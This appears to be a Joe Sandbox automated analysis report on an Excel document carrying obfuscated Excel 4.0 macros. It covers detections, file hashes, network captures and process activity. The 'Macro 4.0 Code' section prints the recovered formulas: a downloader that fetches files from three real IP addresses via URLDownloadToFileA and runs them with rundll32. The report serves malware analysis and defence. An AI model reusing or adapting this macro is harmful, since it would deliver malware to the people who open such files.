Analysis Report a5c5a139_by_Libranalysis
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence |
---|---|---|---|
72 | 0 - 100 | false | 100% |
Signatures
Classification
Startup |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
(initial sample) | JoeSecurity_ObfuscatedMacroInXLSM | Yara detected Obfuscated Macro In XLSM | Joe Security | |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell
Rule authors: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Signature Overview |
---|
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Found Excel 4.0 Macro with suspicious formulas
Data Obfuscation: |
---|
Yara detected Obfuscated Macro In XLSM
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting (11) | Path Interception | Process Injection (1) | Masquerading (1) | OS Credential Dumping | File and Directory Discovery (1) | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution (22) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools (1) | LSASS Memory | System Information Discovery (2) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol (11) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll32 (1) | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (1) | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting (11) | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |

Numbers in parentheses are the report's superscript markers on the techniques observed in this analysis; unmarked cells are the matrix template.
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
(initial sample) | 0% | ReversingLabs | | |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
 | 0% | Avira URL Cloud | safe | |
 | 0% | URL Reputation | safe | |
 | 0% | URL Reputation | safe | |
 | 0% | URL Reputation | safe | |
 | 0% | URL Reputation | safe | |
 | 0% | Avira URL Cloud | safe | |
 | 0% | URL Reputation | safe | |
 | 0% | URL Reputation | safe | |
 | 0% | URL Reputation | safe | |
 | 0% | URL Reputation | safe | |
 | 0% | Avira URL Cloud | safe | |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
 | false | | unknown |
 | false | | unknown |
 | false | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
 | | false | | high |
 | | false | | high |
 | | false | | high |
 | | false | | high |
 | | false | | unknown |
 | | false | | unknown |
 | | false | | high |
 | | false | | high |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
185.198.57.83 | unknown | Netherlands | 60117 | HSAE | false |
45.90.57.62 | unknown | Bulgaria | 204957 | GREENFLOID-ASUA | false |
194.156.98.173 | unknown | Russian Federation | 135330 | ADCDATACOM-AS-APADCDATACOMHK | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 414449 |
Start date: | 14.05.2021 |
Start time: | 18:19:44 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 6s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | a5c5a139_by_Libranalysis (renamed file extension from none to xlsx) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal72.expl.evad.winXLSX@7/8@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection |
---|---|---|---|
185.198.57.83 | (not captured) | | malicious |
185.198.57.83 | (not captured) | | malicious |
45.90.57.62 | (not captured) | | malicious |
45.90.57.62 | (not captured) | | malicious |
194.156.98.173 | (not captured) | | malicious |
194.156.98.173 | (not captured) | | malicious |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection |
---|---|---|---|
HSAE | 20 other samples (names and hashes not captured) | | malicious |
GREENFLOID-ASUA | 20 other samples (names and hashes not captured) | | malicious |
ADCDATACOM-AS-APADCDATACOMHK | 15 other samples (names and hashes not captured) | | malicious |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 185386 |
Entropy (8bit): | 7.326521161282199 |
Encrypted: | false |
SSDEEP: | 3072:0LQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57do:0Lex0VAIu4bVYeVHrK5AySfahk8 |
MD5: | A6E3680B30CEC6746291E55B7D9B6975 |
SHA1: | E45C3A057F840EF4C96AB8233E1E21700BBDA199 |
SHA-256: | 89934494B26BCA1A6B28C2D262392548FA12CEBDF648E5F2DCD793CBF71FB261 |
SHA-512: | FD0DE48198B51F437ADFFC5A0F12880334047D177E67D92199EFEF09F697FC0771D738B28E47EAB17FD52A772AE74CEAFABFD0F7253C526B86D5ADD4912F712B |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 201556 |
Entropy (8bit): | 7.357000821698613 |
Encrypted: | false |
SSDEEP: | 6144:taBwxLex0VAIu4bVYeVHrK5AySfahklOGL7:ttlex0VbLbGeH+59SjEGX |
MD5: | EDA15C10E3180C047F6CDB5963A35AA8 |
SHA1: | 76FDEB42F4307B4DA7279C64F413736B407C6FED |
SHA-256: | B7A3CAB098B593EBAC220066576493F3AE525362C2C283DD93EE664DF0D3578C |
SHA-512: | 900AF245DCBBCA5FB7A6234B2485B61DE3D84E33F5A88F8BCDB02831E74402023D32CC8AC18C4DFDE59D56C73DE3BB8745ACEA4C50ABE9FA37A7D07F0BD58500 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.502712221051524 |
Encrypted: | false |
SSDEEP: | 12:85QaCLgXg/XAlCPCHaXtB8XzB/xs9ZX+WnicvbSR9bDtZ3YilMMEpxRljKt2TdJU:85U/XTd6jcZYe6Dv3qlrNru/ |
MD5: | 31D9A95EA06A55CCB6840E8E1F5C6EB7 |
SHA1: | 8CAD094E619443D49BBF2C5EF5E0D02DE9A93EDF |
SHA-256: | C53CD5D78F3A4A18351F722B683BECA2630CE31576186821BD443D53C1537DFD |
SHA-512: | FC73738150AB5C192151E3E33AF03AA52F56D0071D00B136AC97372D65ABECC792EFC46216D6A601086CE91BA55D98A414501CC48CAC81DC1AF31621BC9C321E |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 4.606023709505623 |
Encrypted: | false |
SSDEEP: | 48:83/XT0jhfOOENr/hNCOOEylQh23/XT0jhfOOENr/hNCOOEylQ/:83/XojhfOFHNCOFylQh23/XojhfOFHNv |
MD5: | DC7596373682AD43A7733D42FE2A0A74 |
SHA1: | 2121DA076AEADE04038FFC86671D24132C5DB4D6 |
SHA-256: | DED727AA295B5484BC7B124BD554095FA6F5DDEE592B978DF2D16D4BCAF2767E |
SHA-512: | DCE6FA7BDA244278545E1AD3600E701351702E3A3C93F73FFB5B861073E75F928A67BD8430B58805B748BAB0722D2C1BA1F3BA9278354A84A73B12034930D0D8 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 127 |
Entropy (8bit): | 4.670590395516913 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWPS6IUwSLMp6lcQHl6IUwSLMp6lmxWPS6IUwSLMp6lv:dj8hN2NXhNf |
MD5: | 41D0C0C77A2F9EA83301A886C932D7D2 |
SHA1: | 7E3FF4C55C5C7C3456C395AAD7105BF8E02DF356 |
SHA-256: | 1723978535AF19FDC47AA70EB6D687456981094429EF402E6CD768FB726B7DE2 |
SHA-512: | 508F4340A42840E74085FC4076E9308E97CD2CCA97E700CD191B67EC17E47FAE890DBDAF92917F4D76E53D35C6C11D5060DE9F1093DB45EC2287EBE78D6A3080 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 200665 |
Entropy (8bit): | 7.351335282810134 |
Encrypted: | false |
SSDEEP: | 3072:uEwLQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57dDOOLR:uxLex0VAIu4bVYeVHrK5AySfahkvOOLR |
MD5: | 8EB6632AB55682C48CAC51495A89946C |
SHA1: | 586F7CF6009A5F5EC008FF072720ED364F350A85 |
SHA-256: | 94154E914FC7661E71010367A385662CF250D034091E0EF2BA10CB1EADCA9A43 |
SHA-512: | 5976F09FD656A9A7C6E62A0883124FF35CDB43D0DF8975234EA30D033C6655672130917C84A466B4246DC6B72D5618F9CCE6294D3945E783D71C443A68ADDD29 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | false |
Reputation: | high, very likely benign file |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Static File Info |
---|
General | |
---|---|
Entropy (8bit): | 7.361461703898337 |
File name: | a5c5a139_by_Libranalysis.xlsx |
File size: | 202458 |
MD5: | a5c5a139b458c718527f59afe34a759a |
SHA1: | a2743d88245ac25263afffd7f4dcbd0fe53e0bdf |
SHA256: | 16383e719fa9ff39d7d4dac2631fa8bfe0a6f63d5130c33053bc0db5e5aa1f89 |
SHA512: | 274978ae4caafc3474896b5b4478f59eacfd056f3a258bbd3c6fec7933586d93ba90dbbab5a90e10c0fcd47b4073ca287ada65ed1daabbb98abd5fa559306e2d |
SSDEEP: | 3072:ctbmLQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57dB:4mLex0VAIu4bVYeVHrK5AySfahk1 |
File Content Preview: | PK..........!..H.g............[Content_Types].xml ...( |
File Icon |
---|
Icon Hash: | e4e2aa8aa4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "a5c5a139_by_Libranalysis.xlsx" |
---|
Macro 4.0 Code |
---|
Excel 4.0 macro formulas recovered from the sheet cells, dumped as CSV (one sheet row per line, cells comma-separated). The strings are deliberately split across cells and concatenated at run time; read together, they register urlmon's URLDownloadToFileA under the name JKKHYUGFD, fetch a file from each of the three contacted IPs into ..\lertio.cersw, ..\lertio.cersw1 and ..\lertio.cersw2, and launch each one through rundll32 with the DllRegisterServer export, which matches the UrlDownloadToFile signature and the three rundll32.exe processes recorded below.

```text
"=FORMULA(Sheet000!J17&Sheet000!J22&Sheet000!J19,G19)=PI()=PI()=PI()"=HALT()
,,,"=FORMULA(Sheet000!P16,F27)=PI()=PI()=PI()",,,,,,,,,,,,"=NOW()&"".dat""",,,,,=,,,,REGIS,,,,"TER(""uRlM",,,,"=""htt""""on"",""URLDown",,"=""45.90.57.62/""","=JKKHYUGFD(0,G27&G28&E28&F23,""..\lertio.cersw"",0,0)",p://"loadToFileA"",""J",,"=""185.198.57.83/""","=JKKHYUGFD(0,G27&G28&E29&F23,""..\lertio.cersw1"",0,0)","JCCBB"",""JKKH",,"=""194.156.98.173/""","=JKKHYUGFD(0,G27&G28&E30&F23,""..\lertio.cersw2"",0,0)","YUGFD"",,1,9)",,,,,,,,,,,,,,,,,,,=GOTO(Sheet2!H13),
"=ON.TIME(NOW()+""00:00:02"",""Hot"")"=HALT()
"=FORMULA(Sheet000!J17&Sheet000!J21&Sheet000!J19,G19)=PI()=PI()=PI()"=GOTO(Sheet4!G5)
"=FORMULA(Sheet000!J17&Sheet000!J18&Sheet000!J19,H25)=PI()=PI()=PI()",,=,,,,"EXEC(""ru",,,,"ndll32 ""&""",,,,..\lertio.cersw,..\lertio.cersw1,..\lertio.cersw2,,"""&"",Dll",,,,Regist,,,,"erServer"")",,,,,,,,,,,,,,,,,,,,,,=GOTO(Sheet3!G2),,,,
```
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/14/21-18:20:46.726203 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49165 | 45.90.57.62 | 192.168.2.22 |
05/14/21-18:20:47.007214 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49166 | 185.198.57.83 | 192.168.2.22 |
05/14/21-18:20:52.224764 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 194.156.98.173 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 14, 2021 18:20:46.480609894 CEST | 49165 | 80 | 192.168.2.22 | 45.90.57.62 |
May 14, 2021 18:20:46.521224022 CEST | 80 | 49165 | 45.90.57.62 | 192.168.2.22 |
May 14, 2021 18:20:46.521389008 CEST | 49165 | 80 | 192.168.2.22 | 45.90.57.62 |
May 14, 2021 18:20:46.522207022 CEST | 49165 | 80 | 192.168.2.22 | 45.90.57.62 |
May 14, 2021 18:20:46.561770916 CEST | 80 | 49165 | 45.90.57.62 | 192.168.2.22 |
May 14, 2021 18:20:46.726202965 CEST | 80 | 49165 | 45.90.57.62 | 192.168.2.22 |
May 14, 2021 18:20:46.726270914 CEST | 49165 | 80 | 192.168.2.22 | 45.90.57.62 |
May 14, 2021 18:20:46.752799034 CEST | 49166 | 80 | 192.168.2.22 | 185.198.57.83 |
May 14, 2021 18:20:46.808867931 CEST | 80 | 49166 | 185.198.57.83 | 192.168.2.22 |
May 14, 2021 18:20:46.809041023 CEST | 49166 | 80 | 192.168.2.22 | 185.198.57.83 |
May 14, 2021 18:20:46.809680939 CEST | 49166 | 80 | 192.168.2.22 | 185.198.57.83 |
May 14, 2021 18:20:46.865840912 CEST | 80 | 49166 | 185.198.57.83 | 192.168.2.22 |
May 14, 2021 18:20:47.007214069 CEST | 80 | 49166 | 185.198.57.83 | 192.168.2.22 |
May 14, 2021 18:20:47.007383108 CEST | 49166 | 80 | 192.168.2.22 | 185.198.57.83 |
May 14, 2021 18:20:47.018506050 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:20:50.027827024 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:20:50.279433012 CEST | 80 | 49167 | 194.156.98.173 | 192.168.2.22 |
May 14, 2021 18:20:50.279583931 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:20:50.280206919 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:20:50.531142950 CEST | 80 | 49167 | 194.156.98.173 | 192.168.2.22 |
May 14, 2021 18:20:52.224764109 CEST | 80 | 49167 | 194.156.98.173 | 192.168.2.22 |
May 14, 2021 18:20:52.224916935 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:21:51.728797913 CEST | 80 | 49165 | 45.90.57.62 | 192.168.2.22 |
May 14, 2021 18:21:51.728991985 CEST | 49165 | 80 | 192.168.2.22 | 45.90.57.62 |
May 14, 2021 18:21:52.008661985 CEST | 80 | 49166 | 185.198.57.83 | 192.168.2.22 |
May 14, 2021 18:21:52.008863926 CEST | 49166 | 80 | 192.168.2.22 | 185.198.57.83 |
May 14, 2021 18:21:57.228473902 CEST | 80 | 49167 | 194.156.98.173 | 192.168.2.22 |
May 14, 2021 18:21:57.228738070 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:22:46.409228086 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:22:46.409770966 CEST | 49166 | 80 | 192.168.2.22 | 185.198.57.83 |
May 14, 2021 18:22:46.411212921 CEST | 49165 | 80 | 192.168.2.22 | 45.90.57.62 |
May 14, 2021 18:22:46.450882912 CEST | 80 | 49165 | 45.90.57.62 | 192.168.2.22 |
May 14, 2021 18:22:46.463902950 CEST | 80 | 49166 | 185.198.57.83 | 192.168.2.22 |
May 14, 2021 18:22:46.659295082 CEST | 80 | 49167 | 194.156.98.173 | 192.168.2.22 |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 45.90.57.62 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 14, 2021 18:20:46.522207022 CEST | 0 | OUT | |
May 14, 2021 18:20:46.726202965 CEST | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49166 | 185.198.57.83 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 14, 2021 18:20:46.809680939 CEST | 1 | OUT | |
May 14, 2021 18:20:47.007214069 CEST | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49167 | 194.156.98.173 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 14, 2021 18:20:50.280206919 CEST | 3 | OUT | |
May 14, 2021 18:20:52.224764109 CEST | 4 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 18:20:43 |
Start date: | 14/05/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Imagebase: | 0x13f130000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:20:55 |
Start date: | 14/05/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Imagebase: | 0xffd20000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:20:55 |
Start date: | 14/05/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Imagebase: | 0xffd20000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:20:55 |
Start date: | 14/05/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Imagebase: | 0xffd20000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|